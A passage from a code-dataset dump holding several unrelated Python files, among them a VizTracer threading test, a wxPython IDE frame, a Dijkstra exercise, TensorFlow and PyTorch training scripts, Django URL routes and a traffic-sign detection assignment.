if n < 2:\n return 1\n time.sleep(0.000001)\n return fib(n - 1) + fib(n - 2)\n\n\nclass MyThread(threading.Thread):\n def run(self):\n fib(10)\n\n\nclass TestMultithread(BaseTmpl):\n def test_basic(self):\n tracer = VizTracer(max_stack_depth=4)\n tracer.start()\n\n thread1 = MyThread()\n thread2 = MyThread()\n thread3 = MyThread()\n thread4 = MyThread()\n\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n threads = [thread1, thread2, thread3, thread4]\n\n for thread in threads:\n thread.join()\n\n tracer.stop()\n entries = tracer.parse()\n self.assertGreater(entries, 160)\n\n metadata = [e for e in tracer.data[\"traceEvents\"] if e[\"ph\"] == \"M\"]\n self.assertEqual(len([e for e in metadata if e[\"name\"] == \"process_name\"]), 1)\n self.assertEqual(len([e for e in metadata if e[\"name\"] == \"thread_name\"]), 5)\n\n def test_with_small_buffer(self):\n tracer = VizTracer(tracer_entries=300)\n tracer.start()\n\n thread1 = MyThread()\n thread2 = MyThread()\n thread3 = MyThread()\n thread4 = MyThread()\n\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n threads = [thread1, thread2, thread3, thread4]\n\n for thread in threads:\n thread.join()\n\n tracer.stop()\n entries = tracer.parse()\n self.assertEqual(entries, 300)\n\n\nfile_log_sparse = \"\"\"\nimport threading\nfrom viztracer import log_sparse\n\nclass MyThreadSparse(threading.Thread):\n def run(self):\n self.sparse_func()\n\n @log_sparse\n def sparse_func(self):\n return 0\n\nthread1 = MyThreadSparse()\nthread2 = MyThreadSparse()\n\nthread1.start()\nthread2.start()\n\nthreads = [thread1, 
thread2]\n\nfor thread in threads:\n thread.join()\n\"\"\"\n\n\nclass TestMultithreadCmdline(CmdlineTmpl):\n def test_with_log_sparse(self):\n self.template([\"viztracer\", \"-o\", \"result.json\", \"--log_sparse\", \"cmdline_test.py\"],\n expected_output_file=\"result.json\",\n script=file_log_sparse,\n expected_entries=2)\n","sub_path":"tests/test_multithread.py","file_name":"test_multithread.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"544607264","text":"# main_frame.py\n\nr'''Primary frame (window) for the IDE.'''\n\nimport sys\nimport wx\n\nfrom ucc.gui import registry\nfrom ucc.gui.other.main_menu_bar import MainMenuBar\nfrom ucc.gui.panels.left_tree_panel import LeftTreePanel\nfrom ucc.gui.panels.right_main_panel import RightMainPanel\nfrom ucc.gui import debug\n\nclass MainFrame(wx.Frame):\n def __init__(self, parent, id, title):\n super(MainFrame, self).__init__(parent, id, title,\n size = list(map(int,\n registry.config.get('gui', 'window-size').split('x'))),\n style = wx.DEFAULT_FRAME_STYLE # | wx.NO_FULL_REPAINT_ON_RESIZE\n )\n self.SetMinSize((970,720))\n \n # setup status bar\n \n self.CreateStatusBar()\n \n # setup menu bar\n \n registry.mainMenuBar = MainMenuBar(self)\n self.SetMenuBar(registry.mainMenuBar)\n \n # setup toolbar\n \n registry.mainToolbar = self.CreateToolBar(style = wx.TB_HORIZONTAL)\n registry.mainToolbar.AddLabelTool(registry.ID_OPEN, '', wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddLabelTool(registry.ID_SAVE_ALL, '', wx.ArtProvider.GetBitmap(wx.ART_FILE_SAVE, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddSeparator()\n registry.mainToolbar.AddLabelTool(registry.ID_SAVE_WORD, '', wx.ArtProvider.GetBitmap(wx.ART_FILE_SAVE, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddLabelTool(registry.ID_VERIFY, '', wx.ArtProvider.GetBitmap(wx.ART_TICK_MARK, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddSeparator()\n registry.mainToolbar.AddLabelTool(registry.ID_COMPILE, '', wx.ArtProvider.GetBitmap(wx.ART_EXECUTABLE_FILE, wx.ART_TOOLBAR))\n registry.mainToolbar.AddLabelTool(registry.ID_LOAD, '', wx.ArtProvider.GetBitmap(wx.ART_GO_FORWARD, wx.ART_TOOLBAR))\n registry.mainToolbar.Realize()\n \n self.Bind(wx.EVT_TOOL, registry.app.onOpen, id=registry.ID_OPEN)\n self.Bind(wx.EVT_TOOL, registry.app.onSaveWord, id=registry.ID_SAVE_WORD)\n self.Bind(wx.EVT_TOOL, registry.app.onCompile, id=registry.ID_COMPILE)\n self.Bind(wx.EVT_TOOL, registry.app.onLoad, id=registry.ID_LOAD)\n self.Bind(wx.EVT_CLOSE, self.onExit)\n \n # setup mainPanel\n \n registry.mainPanel = wx.Panel(self, -1)\n \n # setup sizer\n \n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(registry.mainPanel, 1, wx.EXPAND)\n \n self.SetSizer(sizer)\n \n # setup splitter\n \n splitter = wx.SplitterWindow(registry.mainPanel, -1, style=wx.SP_3D)\n \n # setup panels\n \n registry.leftTreePanel = LeftTreePanel(splitter, -1, wx.BORDER_SUNKEN | wx.WANTS_CHARS)\n registry.rightMainPanel = RightMainPanel(splitter, -1, wx.BORDER_SUNKEN)\n \n # setup splitter/sizers\n \n splitter.SetMinimumPaneSize(200)\n splitter.SplitVertically(registry.leftTreePanel,\n registry.rightMainPanel,\n registry.config.getint('gui', 'left-panel-width'))\n \n # setup sizer\n \n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(splitter, 1, wx.EXPAND)\n registry.mainPanel.SetSizer(sizer)\n \n # paint\n \n self.paint()\n \n # show frame\n \n self.Center()\n self.Show(True)\n \n def paint(self):\n debug.trace(\"Painting 
mainFrame\")\n registry.leftTreePanel.paint()\n registry.rightMainPanel.paint()\n \n def onExit(self, event):\n \n # make sure all words are saved\n \n opened_words = [word for word in \\\n list(registry.top_package.word_dict.values()) \\\n if word.save_state == False]\n if len(opened_words):\n dlg = ConfirmSaveDialog(None, -1, \"Do you want to save the \" \\\n \"currently opened words?\", \\\n size=(350, 200))\n val = dlg.ShowModal()\n if val == wx.ID_SAVE:\n debug.notice(\"Saving Words\")\n for word in opened_words:\n word.save()\n elif val == wx.ID_NO:\n debug.notice(\"Not Saving Words\")\n else:\n dlg.Destroy()\n return\n \n dlg.Destroy()\n \n event.Skip()\n \n\nclass ConfirmSaveDialog(wx.Dialog):\n def __init__(self, parent, id, title, *args, **kwargs):\n super(ConfirmSaveDialog, self).__init__(parent, id, title ,*args, **kwargs)\n \n sizer = wx.BoxSizer(wx.VERTICAL)\n \n label = wx.StaticText(self, -1, \"Do you want to save the currently open words?\")\n sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)\n \n line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)\n sizer.Add(line, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP, 5)\n \n btnsizer = wx.StdDialogButtonSizer()\n \n btn = wx.Button(self, wx.ID_SAVE)\n btn.Bind(wx.EVT_BUTTON, lambda event: self.EndModal(wx.ID_SAVE))\n btn.SetDefault()\n btnsizer.AddButton(btn)\n \n btn = wx.Button(self, wx.ID_NO)\n btn.Bind(wx.EVT_BUTTON, lambda event: self.EndModal(wx.ID_NO))\n btnsizer.AddButton(btn)\n \n btn = wx.Button(self, wx.ID_CANCEL)\n btnsizer.AddButton(btn)\n \n btnsizer.Realize()\n \n sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)\n \n self.SetSizer(sizer)\n sizer.Fit(self)\n \n self.CenterOnScreen()\n \n","sub_path":"ucc/gui/frames/main_frame.py","file_name":"main_frame.py","file_ext":"py","file_size_in_byte":5744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"386734799","text":"#Sending email\n#Dijistra algorithm\nimport queue\nMAX = 100\nINF = int(1e9)\n\n\ndef Dijistra(s,graph,dist):\n pq = queue.PriorityQueue()\n pq.put((s,0))\n dist[s] = 0\n while pq.empty() == False:\n top = pq.get()\n node = top[0]\n d = top[1]\n for neighbor in graph[node]:\n if d + neighbor[1] < dist[neighbor[0]]:\n dist[neighbor[0]] = d + neighbor[1]\n pq.put((neighbor[0],dist[neighbor[0]]))\n path[neighbor[0]] = node\n\nif __name__ == '__main__':\n testcase = int(input())\n result = list()\n n = 50000\n while(testcase > 0):\n graph = [[] for i in range(n+5)]\n n, m, s, d = map(int,input().split())\n for i in range(m):\n u, v, cost = map(int,input().split())\n graph[u].append((v,cost))\n graph[v].append((u,cost))\n\n dist = [INF for i in range(n+5)]\n path = [-1 for i in range(n+5)]\n Dijistra(s,graph,dist)\n ans = dist[d]\n result.append(ans)\n testcase = testcase - 1\n\n #print(result)\n for i in range(len(result)):\n if result[i] == INF:\n print('Case ' + '#%d: ' %i + 'unreachable')\n else:\n print('Case ' + '#%d: %d' % (i,result[i]) )\n","sub_path":"BigO_Algorithm/Homework_Day9/sending_email.py","file_name":"sending_email.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"46727091","text":"import tensorflow as tf\nimport numpy as np\nimport random\nimport pandas as 
pd\n\n#Path\ninput_data_path='C:/TF/in_data.txt'\noutput_data_path='C:/TF/out_data.txt'\nmodel_path=\"C:/TF/model.ckpt\"\noutput_test_path=\"C:/TF/test_outputs.txt\"\ntargets_test_path=\"C:/TF/test_targets.txt\"\nmodel_struct_path=\"C:/TF/model.txt\"\n\n#struct=open(model_struct_path,'r')\n#struct.read()\n\n\n# Parameters\nlearning_rate = 0.001\ndrop_chance=0.4\n\nbatch_size = 100\ndisplay_step = 1\nmax_epoch=100\nexamples=200\ntrain_size=0.85\n\nlayers=2\nnet_struct=[100,100]\nnet_struct_fun=[tf.nn.sigmoid,tf.nn.sigmoid]\n\n# Network Parameters\nn_hidden_1 = 50\nn_hidden_2 = 50\nn_hidden_3 = 50\nn_hidden_4 = 50\nn_hidden_5 = 50\nn_input = 3\nn_classes = 1\n\n#Input Data\nX=np.genfromtxt(input_data_path)\nY=np.genfromtxt(output_data_path)\nX=np.float32(X)\nY=np.float32(Y)\ndata_size=X.shape[0]\ntrain_size*=data_size\ntrain_size=int(train_size)\ntest_size=data_size-train_size\nX=np.reshape(X,[data_size,n_input])\nY=np.reshape(Y,[data_size,n_classes])\n\nXnorm=np.empty([examples,n_input])\nYnorm=np.empty([examples,n_classes])\n\nXmin=np.empty([n_input])\nXmax=np.empty([n_input])\nYmin=np.empty([n_classes])\nYmax=np.empty([n_classes])\n\nfor index in range(n_input):\n    Xmin[index]=X[0][index]\n    Xmax[index]=X[0][index]\nfor index in range(n_classes):\n    Ymin[index]=Y[0][index]\n    Ymax[index]=Y[0][index]\nfor data_index in range(examples):\n    for input_index in range(n_input):\n        if(Xmin[input_index]>=X[data_index][input_index]):\n            Xmin[input_index] = X[data_index][input_index]\n        if(Xmax[input_index]<=X[data_index][input_index]):\n            Xmax[input_index] = X[data_index][input_index]\nfor data_index in range(examples):\n    for input_index in range(n_classes):\n        if(Ymin[input_index]>=Y[data_index][input_index]):\n            Ymin[input_index] = Y[data_index][input_index]\n        if(Ymax[input_index]<=Y[data_index][input_index]):\n            Ymax[input_index] = Y[data_index][input_index]\n\n# np.delete returns a new array instead of modifying in place, so slice off the unused rows\nX = X[:examples]\nY = Y[:examples]\n\ndef normalize(x,xmin,xmax,ymin,ymax):\n    return (((ymax-ymin)*(x-xmin)/(xmax-xmin)) + ymin)\n\nfor index in range(examples):\n    for i in range(n_input):\n        Xnorm[index][i]=normalize(X[index][i],Xmin[i],Xmax[i],-10.0,10.0)\n\nfor index in range(examples):\n    for i in range(n_classes):\n        Ynorm[index][i] = normalize(Y[index][i], Ymin[i], Ymax[i], 0.0, 1.0)\n\n\nXnorm=np.float32(Xnorm)\nYnorm=np.float32(Ynorm)\n\n# Store layers weight & bias\nweights = {\n    'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n    'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n    'h3': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),\n    'h4': tf.Variable(tf.random_normal([n_hidden_3, n_hidden_4])),\n    'h5': tf.Variable(tf.random_normal([n_hidden_4, n_hidden_5])),\n    'out': tf.Variable(tf.random_normal([n_hidden_5, n_classes]))\n}\nbiases = {\n    'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n    'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n    'b3': tf.Variable(tf.random_normal([n_hidden_3])),\n    'b4': tf.Variable(tf.random_normal([n_hidden_4])),\n    'b5': tf.Variable(tf.random_normal([n_hidden_5])),\n    'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n# tf Graph input\nInput = tf.placeholder(\"float\", [None, n_input])\nOutput = tf.placeholder(\"float\", [None, n_classes])\n\n# Create model\ndef multilayer_perceptron(x):\n\n    layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n    layer_1=tf.nn.sigmoid(layer_1)\n    layer_1=tf.nn.dropout(layer_1,drop_chance)\n\n    layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n    
layer_2=tf.nn.sigmoid(layer_2)\n layer_2=tf.nn.dropout(layer_2,drop_chance)\n\n layer_3 = tf.add(tf.matmul(layer_2, weights['h3']), biases['b3'])\n layer_3=tf.nn.sigmoid(layer_3)\n layer_3=tf.nn.dropout(layer_3,drop_chance)\n\n layer_4 = tf.add(tf.matmul(layer_3, weights['h4']), biases['b4'])\n layer_4=tf.nn.sigmoid(layer_4)\n layer_4=tf.nn.dropout(layer_4,drop_chance)\n\n layer_5 = tf.add(tf.matmul(layer_4, weights['h5']), biases['b5'])\n layer_5=tf.nn.sigmoid(layer_5)\n layer_5=tf.nn.dropout(layer_5,drop_chance)\n\n out_layer = tf.add(tf.matmul(layer_5, weights['out']), biases['out'])\n #out_layer=tf.nn.sigmoid(out_layer)\n return out_layer\n\nlogits=multilayer_perceptron(Xnorm)\n\n# Define loss and optimizer\n#loss_op = tf.reduce_mean(tf.square(Y-logits))\nloss_op = tf.losses.mean_squared_error(labels=Y, predictions=logits)\n#loss_op=tf.reduce_mean(tf.square(Y-logits)/2.0)\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\nvarinit=tf.global_variables_initializer()\n\nsaver = tf.train.Saver()\n\n\nwith tf.Session() as sess:\n sess.run(init)\n # Training cycle\n epoch=0\n avg_cost=1\n\n #save_path=saver.restore(sess,model_path)\n #while(avg_cost>0.00001):\n #while (epoch exp name mappings - done\n\n\"\"\"\n\nimport sys\nsys.path.append('/home/scratch/kkorovin')\n\nimport os\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport pickle as pkl\nfrom tqdm import tqdm\nfrom copy import deepcopy\nfrom torch.optim import Adam, SGD\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau, StepLR\n\nfrom constants import DEVICE\nfrom datasets import get_data_loader\nfrom models import get_model\nfrom utils import *\n\n# checkpoint can be loaded into an initialized model with .load(name)\n\ndef parse_train_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', type=str, help='model to use')\n parser.add_argument('--dataset', type=str, help='dataset to use')\n parser.add_argument('--batch_size', default=64, type=int, help='batch size')\n parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')\n parser.add_argument('--n_epochs', default=15, type=int, help='number of training epochs')\n parser.add_argument('--verbose', default=False, type=bool, help='whether to display training statistics')\n args = parser.parse_args()\n return args\n\n\ndef run_training(model_name=\"vgg16\",\n dataset_name=\"cifar10\",\n batch_size=32, lr=1e-3, n_epochs=10,\n save_hist_period=1, verbose=False):\n \"\"\"\n For now only one model (vgg-16).\n\n Params:\n :model_name: \"vgg{11,13,16,19}\" or \"lenet\" (or \"[...]_random\")\n :dataset_name: \"cifar10\" or \"mnist\"\n :batch_size: int\n :lr: float\n :n_epochs: number of training epochs\n :save_hist_period: frequency with which points are saved\n\n \"\"\"\n # name of current checkpoint/run\n check_name = record_experiment(model_name, dataset_name, batch_size, lr)\n\n # setup model, optimizer and logging\n model = get_model(model_name).to(DEVICE)\n optimizer = SGD(params=model.parameters(), lr=lr)\n # scheduler = ReduceLROnPlateau(optimizer, patience=3,\n # threshold=0.1, min_lr=1e-5)\n scheduler = StepLR(optimizer, step_size=10, gamma=0.1)\n\n cross_ent = nn.CrossEntropyLoss()\n\n # load data\n train_loader = get_data_loader(dataset_name, \"train\", batch_size)\n val_loader = get_data_loader(dataset_name, \"val\", batch_size)\n\n history = init_history()\n\n 
update_history({\"train_loss\": float(\"inf\"),\n \"val_acc\": 0.,\n \"weights\": deepcopy(model.state_dict())},\n history, check_name)\n\n for epoch in range(n_epochs):\n model.train()\n if verbose: print(\"Starting training epoch {}\".format(epoch+1))\n\n running_loss = 0.\n num_batches = len(train_loader)\n\n for (xs, ys) in train_loader:\n xs, ys = xs.to(DEVICE), ys.to(DEVICE)\n optimizer.zero_grad()\n logits = model(xs)\n\n loss = cross_ent(logits, ys)\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), 5.)\n optimizer.step()\n\n running_loss += loss.item()\n if np.isnan(running_loss):\n print(\"Loss is nan\")\n exit(0)\n\n avg_loss = running_loss / num_batches\n scheduler.step(avg_loss)\n model.save(check_name)\n\n if verbose: print(\"Epoch {} loss: {:.3f}\".format(epoch+1, avg_loss))\n\n if epoch % save_hist_period == 0:\n model.eval()\n accs = []\n for (xs, ys) in val_loader:\n xs, ys = xs.to(DEVICE), ys.to(DEVICE)\n logits = model(xs)\n y_pred = logits.argmax(dim=1)\n batch_acc = (y_pred == ys).float().mean().item()\n accs.append(batch_acc)\n\n if verbose: print(\"Validation accuracy: {:.3f}\".format(np.mean(accs)))\n update_history({\"train_loss\": avg_loss,\n \"val_acc\": np.mean(accs),\n \"weights\": deepcopy(model.state_dict())},\n history, check_name)\n\n print(\"Last avg loss {}, eval acc {}\".format(avg_loss, np.mean(accs)))\n # after the end of all epochs, last checkpoint has been saved\n\n\nif __name__==\"__main__\":\n args = parse_train_args()\n run_training(args.model, args.dataset,\n batch_size=args.batch_size, lr=args.lr,\n n_epochs=args.n_epochs, verbose=args.verbose)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"500439797","text":"\"\"\"\n@author: Alexander Studier-Fischer, Jan Odenthal, Berkin Özdemir, University of Heidelberg\n\"\"\"\n# !!! 
The values in this file must be initialized (a proper path, not None) before the main file can be run !!!\n\nPATH_TO_DIRECTORIES = \"..\"\n# Example: PATH_TO_DIRECTORIES = \"path/to/the/folder/containing/all/the/folders\"\n\nPATH_TO_POWERPOINT = \"../_PowerPoint.pptx\"\n# Example: PATH_TO_POWERPOINT = \"path/to/my/powerpoint/important_powerpoint.pptx\"\n\nPATH_TO_BACKGROUND_PIC = \"BackgroundPic.png\"\n","sub_path":"1.1_ImageMuncher/INPUTS.py","file_name":"INPUTS.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"207847503","text":"import os\r\n\r\ndef cal(filename):\r\n\tf=open(filename)\r\n\tfor i in range(3):\r\n\t\tf.readline()\r\n\tsize=f.readline()\r\n\tsize=size.split(',')[2].split(':')[1][1:]\r\n\tt=f.readline()\r\n\tt=t.split(',')[0]\r\n\tf.close()\r\n\treturn (size,t)\r\n\r\n\r\nif __name__=='__main__':\r\n files=os.listdir()\r\n models1 = []\r\n for i in range(1,21):\r\n\t models1.append('benchmark_'+ str(i))\r\n models2 = []\r\n for i in range(1,36):\r\n\t models2.append('benchmark_'+str(i))\r\n\r\n models3 =['Banking1','Banking2','CommProtocol','Concurrency','Healthcare1','Healthcare2','Healthcare3','Healthcare4','Insurance','NetworkMgmt','ProcessorComm1','ProcessorComm2','Services','Storage1','Storage2','Storage3','Storage4','Storage5','SystemMgmt','Telecom']\r\n\r\n models4 =['SPIN-S','SPIN-V','GCC','Apache','Bugzilla',]\r\n \r\n res=dict()\r\n for i in models3:\r\n res[i]=[[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0]]\r\n results=list(filter(lambda x:'result' in x,files))\r\n for i in results:\r\n name=i.split('_')\r\n model=name[0]\r\n strength=int(name[2])\r\n repeat=int(name[3])\r\n res[model][strength-2][repeat-1]=cal(i)\r\n\t\r\n f=open('resSize.csv','w')\r\n f.write('model,2_1,2_2,2_3,3_1,3_2,3_3,4_1,4_2,4_3,5_1,5_2,5_3,6_1,6_2,6_3\\n')\r\n for key in models3:\r\n f.write(key+',')\r\n value=res[key]\r\n for i in range(5):\r\n for j in range(3):\r\n if not value[i][j]==0:\r\n f.write(value[i][j][0]+',')\r\n else:\r\n f.write('-,')\r\n f.write('\\n')\r\n f.close()\r\n\t \r\n f=open('resTime.csv','w')\r\n f.write('model,2_1,2_2,2_3,3_1,3_2,3_3,4_1,4_2,4_3,5_1,5_2,5_3,6_1,6_2,6_3\\n')\r\n for key in models3:\r\n f.write(key+',')\r\n value=res[key]\r\n for i in range(5):\r\n for j in range(3):\r\n if not value[i][j]==0:\r\n f.write(value[i][j][1]+',')\r\n else:\r\n f.write('-,')\r\n f.write('\\n')\r\n f.close()\r\n","sub_path":"results/issta20model/cal.py","file_name":"cal.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"422703724","text":"class Solution(object):\n def isReflected(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: bool\n group points by y positions, then check x in pairs\n \"\"\"\n groups = {}\n for x, y in sorted(points):\n if y not in groups:\n groups[y] = [x]\n else:\n groups[y] += x,\n\n possible = None\n for ls in groups.values():\n l, r = 0, len(ls) - 1\n while l <= r:\n tmp = ls[l] + ls[r]\n if tmp % 2:\n return False\n tmp /= 2\n if possible and possible != tmp:\n return False\n possible = tmp\n l += 1\n r -= 1\n return True\n\n\n def isReflected(self, points):\n points.sort()\n return points == sorted([points[0][0] + points[-1][0] - x, y]\n for x, y in points)\n\n\n def isReflected(self, points):\n if not points: return True\n X = min(points)[0] + max(points)[0]\n return {(x, y) for x, y in points} == {(X - x, y) for x, y in 
points}","sub_path":"python/leetcode/356.py","file_name":"356.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418585672","text":"from django.urls import path\n\nfrom .views import (FreeArticleDetailView, FreeArticleListView,\n PremiumArticleDetailView, PremiumArticleListView,\n SearchResultsListView)\n\nurlpatterns = [\n path('free/', FreeArticleListView.as_view(), name='free_article_list'),\n path('premium/', PremiumArticleListView.as_view(), name='premium_article_list'),\n path('free/', FreeArticleDetailView.as_view(), name='free_article_detail'),\n path('premium/', PremiumArticleDetailView.as_view(), name='premium_article_detail'),\n path('search/', SearchResultsListView.as_view(), name='search_results'),\n]\n\n","sub_path":"articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"120633607","text":"\"\"\"\nCS6476: Problem Set 2 Experiment file\n\nThis script contains a series of function calls that run your ps2\nimplementation and output images so you can verify your results.\n\"\"\"\n\n\nimport cv2\n\nimport ps2\n\n\ndef draw_tl_center(image_in, center, state):\n \"\"\"Marks the center of a traffic light image and adds coordinates\n with the state of the current image\n\n Use OpenCV drawing functions to place a marker that represents the\n traffic light center. Additionally, place text using OpenCV tools\n that show the numerical and string values of the traffic light\n center and state. Use the following format:\n\n ((x-coordinate, y-coordinate), 'color')\n\n See OpenCV's drawing functions:\n http://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html\n\n Make sure the font size is large enough so that the text in the\n output image is legible.\n Args:\n image_in (numpy.array): input image.\n center (tuple): center numeric values.\n state (str): traffic light state values can be: 'red',\n 'yellow', 'green'.\n\n Returns:\n numpy.array: output image showing a marker representing the\n traffic light center and text that presents the numerical\n coordinates with the traffic light state.\n \"\"\"\n cv2.circle(image_in,center,2,(0,0,0),3)\n cv2.putText(image_in, (\"((%d, %d), %s)\" % (center[0], center[1], state)), (center[0]+5,center[1]), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), 2, cv2.CV_AA)\n cv2.putText(image_in, (\"((%d, %d), %s)\" % (center[0], center[1], state)), (center[0]+5,center[1]), cv2.FONT_HERSHEY_PLAIN, 1.0, (255, 255, 255), 1, cv2.CV_AA)\n\n return image_in\n\ndef mark_traffic_signs(image_in, signs_dict):\n #print signs_dict\n \"\"\"Marks the center of a traffic sign and adds its coordinates.\n\n This function uses a dictionary that follows the following\n structure:\n {'sign_name_1': (x, y), 'sign_name_2': (x, y), etc.}\n\n Where 'sign_name' can be: 'stop', 'no_entry', 'yield',\n 'construction', 'warning', and 'traffic_light'.\n\n Use cv2.putText to place the coordinate values in the output\n image.\n\n Args:\n image_in (numpy.array): the image to draw on.\n signs_dict (dict): dictionary containing the coordinates of\n each sign found in a scene.\n\n Returns:\n numpy.array: output image showing markers on each traffic\n sign.\n \"\"\"\n for key in signs_dict: \n cv2.circle(image_in,signs_dict[key],2,(0,0,0),3)\n cv2.putText(image_in, (\"(%d, %d)\" % (signs_dict[key][0], signs_dict[key][1])), (signs_dict[key][0]-30,signs_dict[key][1]-10), 
cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), 3, cv2.CV_AA)\n cv2.putText(image_in, (\"(%d, %d)\" % (signs_dict[key][0], signs_dict[key][1])), (signs_dict[key][0]-30,signs_dict[key][1]-10), cv2.FONT_HERSHEY_PLAIN, 1.0, (255, 255, 255), 1, cv2.CV_AA)\n\n cv2.putText(image_in, (\"%s\" % key), (signs_dict[key][0]-25,signs_dict[key][1]+30), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), 3, cv2.CV_AA)\n cv2.putText(image_in, (\"%s\" % key), (signs_dict[key][0]-25,signs_dict[key][1]+30), cv2.FONT_HERSHEY_PLAIN, 1.0, (255,255,255), 1, cv2.CV_AA)\n\n\n return image_in\n\ndef part_1():\n\n input_images = ['simple_tl', 'scene_tl_1', 'scene_tl_2', 'scene_tl_3']#'test_images/tl_green_299_287_background']#'scene_tl_3']\n output_labels = ['ps2-1-a-1', 'ps2-1-a-2', 'ps2-1-a-3', 'ps2-1-a-4']\n\n # Define a radii range, you may define a smaller range based on your\n # observations.\n radii_range = range(10, 30, 1)\n\n for img_in, label in zip(input_images, output_labels):\n\n tl = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords, state = ps2.traffic_light_detection(tl, radii_range)\n\n img_out = draw_tl_center(tl, coords, state)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n #tl = cv2.imread(\"input_images/{}.png\".format(img_in))\n #cv2.imwrite(\"output/{}.png\".format(label), ps2.traffic_light_detection(tl, radii_range))\n\n\ndef part_2():\n\n input_images = ['scene_dne_1', \n 'scene_stp_1', \n 'scene_constr_1',\n 'scene_wrng_1', \n 'scene_yld_1']\n\n output_labels = ['ps2-2-a-1', \n 'ps2-2-a-2', \n 'ps2-2-a-3', \n 'ps2-2-a-4',\n 'ps2-2-a-5']\n\n sign_fns = [ps2.do_not_enter_sign_detection, \n ps2.stop_sign_detection,\n ps2.construction_sign_detection, \n ps2.warning_sign_detection,\n ps2.yield_sign_detection]\n\n sign_labels = ['no_entry','stop','construction','warning','yield']#['no_entry', 'stop', 'construction', 'warning', 'yield']\n\n for img_in, label, fn, name in zip(input_images, output_labels, sign_fns,\n sign_labels):\n\n sign_img = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = fn(sign_img)\n\n temp_dict = {name: coords}\n img_out = mark_traffic_signs(sign_img, temp_dict)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n #sign_img = cv2.imread(\"input_images/{}.png\".format(img_in))\n #cv2.imwrite(\"output/{}.png\".format(label), fn(sign_img))\n\n\ndef part_3():\n\n input_images = ['scene_some_signs', 'scene_all_signs']\n output_labels = ['ps2-3-a-1', 'ps2-3-a-2']\n\n for img_in, label in zip(input_images, output_labels):\n\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef part_4():\n input_images = ['scene_some_signs_noisy', 'scene_all_signs_noisy']\n output_labels = ['ps2-4-a-1', 'ps2-4-a-2']\n\n for img_in, label in zip(input_images, output_labels):\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection_noisy(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef part_5a():\n input_images = ['img-5-a-1', 'img-5-a-2', 'img-5-a-3']\n output_labels = ['ps2-5-a-1', 'ps2-5-a-2', 'ps2-5-a-3']\n\n for img_in, label in zip(input_images, output_labels):\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection_challenge(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef part_5b():\n 
